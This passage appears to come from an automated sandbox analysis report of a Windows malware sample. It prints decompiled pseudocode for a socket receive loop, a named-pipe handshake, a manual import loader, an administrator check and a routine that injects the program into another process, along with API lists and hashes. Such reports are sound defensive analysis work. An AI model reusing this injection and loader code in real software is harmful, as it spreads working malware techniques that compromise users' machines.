										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00402904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0040EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}










































                                                                                0x00402a62
                                                                                0x00402a7a
                                                                                0x00402a7d
                                                                                0x00402a86
                                                                                0x00402a8c
                                                                                0x00402a90
                                                                                0x00402aa0
                                                                                0x00402aa6
                                                                                0x00402aa8
                                                                                0x00402aae
                                                                                0x00402cd8
                                                                                0x00402cde
                                                                                0x00000000
                                                                                0x00402abd
                                                                                0x00402abd
                                                                                0x00402ac9
                                                                                0x00402ac9
                                                                                0x00402ad1
                                                                                0x00402ada
                                                                                0x00402ad3
                                                                                0x00402ad3
                                                                                0x00402ad3
                                                                                0x00402adb
                                                                                0x00402af4
                                                                                0x00402af9
                                                                                0x00402afe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402b06
                                                                                0x00402b0e
                                                                                0x00402b14
                                                                                0x00402b18
                                                                                0x00402b20
                                                                                0x00402b24
                                                                                0x00402b28
                                                                                0x00402b30
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402b3a
                                                                                0x00402b3f
                                                                                0x00402b4a
                                                                                0x00402b50
                                                                                0x00402b52
                                                                                0x00402b58
                                                                                0x00402b6a
                                                                                0x00402b76
                                                                                0x00402b7c
                                                                                0x00402ca6
                                                                                0x00402cad
                                                                                0x00402cb3
                                                                                0x00402cbd
                                                                                0x00402cc7
                                                                                0x00402ccd
                                                                                0x00402ce0
                                                                                0x00000000
                                                                                0x00402ce0
                                                                                0x00402b85
                                                                                0x00402b96
                                                                                0x00402b98
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402ba1
                                                                                0x00402ba6
                                                                                0x00402ba7
                                                                                0x00402bad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402bb3
                                                                                0x00402bb8
                                                                                0x00402bbd
                                                                                0x00402bbf
                                                                                0x00000000
                                                                                0x00402bc9
                                                                                0x00402bd1
                                                                                0x00402c77
                                                                                0x00402c77
                                                                                0x00402c79
                                                                                0x00402c7f
                                                                                0x00402bc5
                                                                                0x00000000
                                                                                0x00402bc5
                                                                                0x00000000
                                                                                0x00402bf3
                                                                                0x00402c08
                                                                                0x00402c0c
                                                                                0x00402c85
                                                                                0x00402c89
                                                                                0x00402c93
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402c93
                                                                                0x00402c12
                                                                                0x00402c1d
                                                                                0x00402c21
                                                                                0x00402c25
                                                                                0x00402c32
                                                                                0x00402c3e
                                                                                0x00402c41
                                                                                0x00402c4a
                                                                                0x00402c4b
                                                                                0x00402c5f
                                                                                0x00402c63
                                                                                0x00402c69
                                                                                0x00402c71
                                                                                0x00402c6b
                                                                                0x00402c6b
                                                                                0x00402c6b
                                                                                0x00402c4d
                                                                                0x00402c57
                                                                                0x00402c57
                                                                                0x00402c73
                                                                                0x00000000
                                                                                0x00402c73
                                                                                0x00402bd1
                                                                                0x00402bc9
                                                                                0x00402b8b
                                                                                0x00402b90
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402b90
                                                                                0x00402c95
                                                                                0x00402c95
                                                                                0x00402c9e
                                                                                0x00402ac3
                                                                                0x00402ac7
                                                                                0x00000000
                                                                                0x00402ac7
                                                                                0x00000000
                                                                                0x00402ca4
                                                                                0x00402ac9
                                                                                0x00402aae
                                                                                0x00000000

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,74CB4F20), ref: 00402A83
                                                                                • HeapAlloc.KERNEL32(00000000,?,74CB4F20), ref: 00402A86
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                • htons.WS2_32(00000000), ref: 00402ADB
                                                                                • select.WS2_32 ref: 00402B28
                                                                                • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                • htons.WS2_32(?), ref: 00402B71
                                                                                • htons.WS2_32(?), ref: 00402B8C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                • String ID:
                                                                                • API String ID: 1639031587-0
                                                                                • Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                • Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040405E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 203COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E0040405E(void* __ecx) {
				unsigned int _v8;
				unsigned int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* _t40;
				void* _t43;
				void* _t49;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t71;
				void* _t82;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t104;

				_t95 = __ecx;
				_v8 = 0;
				_t40 = CreateEventA(0, 1, 1, 0);
				_v16 = _t40;
				if(_t40 != 0) {
					_t43 = E00404000(E00403ECD(_t95),  &_v20);
					_t97 = _t98;
					_t102 = 0x7d0;
					_t92 = 0x100;
					_t99 = 0x4122f8;
					if(_t43 == 0) {
						L10:
						E0040EE2A(_t97, _t99, 0, _t92);
						_t104 = _t103 + 0xc;
						_t93 = 0xa;
						while(1) {
							_t93 = _t93 - 1;
							_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
							if(_t99 != 0xffffffff) {
								break;
							}
							Sleep(0x1f4);
							if(_t93 != 0) {
								continue;
							}
							CloseHandle(_v16);
							return 0;
						}
						L14:
						while(1) {
							do {
								L14:
								while(1) {
									do {
										if(ConnectNamedPipe(_t99, 0) != 0) {
											goto L16;
										}
										_t71 = GetLastError();
										asm("sbb eax, eax");
										if( ~(_t71 - 0x217) + 1 == 0) {
											L25:
											DisconnectNamedPipe(_t99);
											continue;
										}
										L16:
										_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
										_t104 = _t104 + 0x14;
									} while (_t49 == 0);
									_t92 = _v16;
									_v8 = (_v12 >> 2) + _v12;
									E00403F18(_t99,  &_v8, 4, _t92, _t102);
									_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
									_t104 = _t104 + 0x28;
									if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
										goto L25;
									} else {
										_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
										_t104 = _t104 + 0x14;
										if(_t62 == 0 || _v24 != 0xc) {
											goto L25;
										} else {
											_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
											_t104 = _t104 + 0x14;
											if(_t64 == 0) {
												goto L25;
											}
											break;
										}
									}
								}
							} while (_v28 != 1);
							E00403F18(_t99,  &_v8, 4, _t92, _t102);
							_t103 = _t104 + 0x14;
							if(_v32 == 0) {
								_t102 = CloseHandle;
								CloseHandle(_t99);
								CloseHandle(_t92);
								E0040E318();
								L8:
								ExitProcess(0);
							}
							 *0x41215a =  *0x41215a + 1;
						}
					}
					E0040EE2A(_t97, 0x4122f8, 0, 0x100);
					_t103 = _t103 + 0xc;
					if(_v20 == 0xffffffff) {
						goto L10;
					}
					_v12 = E0040ECA5();
					E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
					_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
					_t103 = _t103 + 0x28;
					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
						CloseHandle(_v20);
						goto L10;
					} else {
						_v8 = _v8 + (_v8 >> 2);
						E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
						_t103 = _t103 + 0x14;
						goto L8;
					}
				}
				return 0;
			}



























                                                                                0x0040405e
                                                                                0x0040406d
                                                                                0x00404070
                                                                                0x00404076
                                                                                0x0040407b
                                                                                0x00404090
                                                                                0x00404096
                                                                                0x00404097
                                                                                0x0040409c
                                                                                0x004040a1
                                                                                0x004040a8
                                                                                0x00404130
                                                                                0x00404134
                                                                                0x00404139
                                                                                0x0040413e
                                                                                0x0040413f
                                                                                0x00404153
                                                                                0x00404160
                                                                                0x00404165
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040416c
                                                                                0x00404174
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404179
                                                                                0x00000000
                                                                                0x00404182
                                                                                0x00000000
                                                                                0x00404188
                                                                                0x00404188
                                                                                0x00000000
                                                                                0x00404188
                                                                                0x00404188
                                                                                0x00404193
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404195
                                                                                0x004041a2
                                                                                0x004041a5
                                                                                0x0040425e
                                                                                0x0040425f
                                                                                0x00000000
                                                                                0x0040425f
                                                                                0x004041ab
                                                                                0x004041b6
                                                                                0x004041bb
                                                                                0x004041be
                                                                                0x004041c5
                                                                                0x004041d0
                                                                                0x004041da
                                                                                0x004041e8
                                                                                0x004041ed
                                                                                0x004041f2
                                                                                0x00000000
                                                                                0x00404202
                                                                                0x0040420b
                                                                                0x00404210
                                                                                0x00404215
                                                                                0x00000000
                                                                                0x0040421d
                                                                                0x00404226
                                                                                0x0040422b
                                                                                0x00404230
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404230
                                                                                0x00404215
                                                                                0x004041f2
                                                                                0x00404232
                                                                                0x00404245
                                                                                0x0040424a
                                                                                0x00404251
                                                                                0x0040426a
                                                                                0x00404271
                                                                                0x00404274
                                                                                0x00404276
                                                                                0x0040411f
                                                                                0x00404121
                                                                                0x00404121
                                                                                0x00404253
                                                                                0x00404253
                                                                                0x00404188
                                                                                0x004040b2
                                                                                0x004040b7
                                                                                0x004040be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004040c9
                                                                                0x004040d5
                                                                                0x004040e7
                                                                                0x004040ec
                                                                                0x004040f1
                                                                                0x0040412a
                                                                                0x00000000
                                                                                0x00404101
                                                                                0x0040410b
                                                                                0x00404117
                                                                                0x0040411c
                                                                                0x00000000
                                                                                0x0040411c
                                                                                0x004040f1
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                • ExitProcess.KERNEL32 ref: 00404121
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventExitProcess
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 2404124870-2980165447
                                                                                • Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                • Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406069 Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}
























                                                                                0x00406071
                                                                                0x00406074
                                                                                0x0040607c
                                                                                0x0040607c
                                                                                0x00406082
                                                                                0x00406087
                                                                                0x00406099
                                                                                0x0040609c
                                                                                0x004060a2
                                                                                0x004060a4
                                                                                0x004061b2
                                                                                0x00000000
                                                                                0x004061b5
                                                                                0x004060aa
                                                                                0x004060ad
                                                                                0x004060b5
                                                                                0x004060b5
                                                                                0x004060b8
                                                                                0x004060ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004060c3
                                                                                0x004060c9
                                                                                0x004060cc
                                                                                0x004060cf
                                                                                0x004061ae
                                                                                0x004061ae
                                                                                0x004061ae
                                                                                0x004061ae
                                                                                0x00000000
                                                                                0x004061ae
                                                                                0x004060d5
                                                                                0x004060d5
                                                                                0x004060d8
                                                                                0x004060da
                                                                                0x004060ee
                                                                                0x004060fa
                                                                                0x004060dc
                                                                                0x004060dc
                                                                                0x004060e7
                                                                                0x004060e7
                                                                                0x00406101
                                                                                0x00406104
                                                                                0x00406106
                                                                                0x00000000
                                                                                0x0040610c
                                                                                0x0040610c
                                                                                0x00406112
                                                                                0x00406115
                                                                                0x00406118
                                                                                0x0040611b
                                                                                0x0040611d
                                                                                0x0040612d
                                                                                0x0040612d
                                                                                0x0040612f
                                                                                0x0040611f
                                                                                0x0040611f
                                                                                0x00406127
                                                                                0x00406127
                                                                                0x00406131
                                                                                0x00406133
                                                                                0x00406135
                                                                                0x0040618b
                                                                                0x0040618b
                                                                                0x0040618f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406191
                                                                                0x0040619e
                                                                                0x004061a4
                                                                                0x004061a6
                                                                                0x004060b2
                                                                                0x00000000
                                                                                0x004060b2
                                                                                0x00000000
                                                                                0x00406137
                                                                                0x00406137
                                                                                0x0040613a
                                                                                0x0040613d
                                                                                0x0040613f
                                                                                0x0040613f
                                                                                0x0040615e
                                                                                0x00406164
                                                                                0x00406166
                                                                                0x00406173
                                                                                0x00406173
                                                                                0x00406176
                                                                                0x0040617a
                                                                                0x00406187
                                                                                0x00406187
                                                                                0x00406187
                                                                                0x00000000
                                                                                0x00406187
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x00406168
                                                                                0x0040616b
                                                                                0x0040616e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406170
                                                                                0x00406170
                                                                                0x00000000
                                                                                0x00406170
                                                                                0x0040614a
                                                                                0x00406150
                                                                                0x00000000
                                                                                0x0040617c
                                                                                0x0040617c
                                                                                0x0040617f
                                                                                0x00406181
                                                                                0x00406181
                                                                                0x00000000
                                                                                0x00406185
                                                                                0x00406135
                                                                                0x00406106
                                                                                0x00000000
                                                                                0x004060b5
                                                                                0x00000000

                                                                                APIs
                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
                                                                                • LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
                                                                                • GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
                                                                                • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Read$AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 2438460464-0
                                                                                • Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                • Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
                                                                                • Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                • Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406EDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00406EDD() {
				int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				signed int _t12;
				int _t15;
				int* _t16;

				_t12 =  *0x412048; // 0x0
				if(_t12 < 0) {
					_v20.Value = 0;
					_v16 = 0x500;
					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
					_v8 = _t15;
					if(_t15 != 0) {
						_t6 =  &_v8; // 0x40702a
						_t16 = _t6;
						__imp__CheckTokenMembership(0, _v12, _t16);
						if(_t16 != 0) {
							 *0x412048 = 0 | _v8 == 0x00000000;
						}
						FreeSid(_v12);
					}
					_t12 =  *0x412048; // 0x0
					if(_t12 != 0) {
						_t12 = E00406E36(0x12, 0);
						 *0x412048 = _t12;
					}
				}
				return _t12;
			}










                                                                                0x00406ee0
                                                                                0x00406eed
                                                                                0x00406f06
                                                                                0x00406f09
                                                                                0x00406f0f
                                                                                0x00406f15
                                                                                0x00406f1a
                                                                                0x00406f1c
                                                                                0x00406f1c
                                                                                0x00406f24
                                                                                0x00406f2c
                                                                                0x00406f36
                                                                                0x00406f36
                                                                                0x00406f3e
                                                                                0x00406f3e
                                                                                0x00406f44
                                                                                0x00406f4b
                                                                                0x00406f50
                                                                                0x00406f57
                                                                                0x00406f57
                                                                                0x00406f4b
                                                                                0x00406f5e

                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
                                                                                • FreeSid.ADVAPI32(?), ref: 00406F3E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID: *p@
                                                                                • API String ID: 3429775523-2474123842
                                                                                • Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                • Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
                                                                                • Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                • Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040637C Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4);
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0040EE08(_t15, _t32, _t26);
						_t37 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40);
						if(_t37 == 0) {
							goto L5;
						} else {
							E004062B7(_v8, _t37);
							if(WriteProcessMemory(_a8, _t37, _v8, _t26, 0) != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}









                                                                                0x00406384
                                                                                0x00406395
                                                                                0x0040639a
                                                                                0x004063a9
                                                                                0x004063af
                                                                                0x004063b4
                                                                                0x004063f5
                                                                                0x004063f5
                                                                                0x004063b6
                                                                                0x004063b9
                                                                                0x004063d0
                                                                                0x004063d4
                                                                                0x00000000
                                                                                0x004063d6
                                                                                0x004063da
                                                                                0x004063f3
                                                                                0x004063fc
                                                                                0x00406406
                                                                                0x0040640a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063f3
                                                                                0x004063d4
                                                                                0x0040640f
                                                                                0x00406386
                                                                                0x00406389
                                                                                0x00406389

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 004063EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 1965334864-0
                                                                                • Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                • Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 020865E3 Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 020865F6
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02086610
                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 02086631
                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 02086652
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 1965334864-0
                                                                                • Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                • Instruction ID: 8f2f23149897569958edf0afc58b27ad45b992c6b2ff9c1b4757461061f986fd
                                                                                • Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                • Instruction Fuzzy Hash: 38119171600358BFDB21AF65DC0AF9B3FACEB057A5F014024FA09E7250DBB2DD109AA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408E26 Relevance: 4.6, APIs: 3, Instructions: 63fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
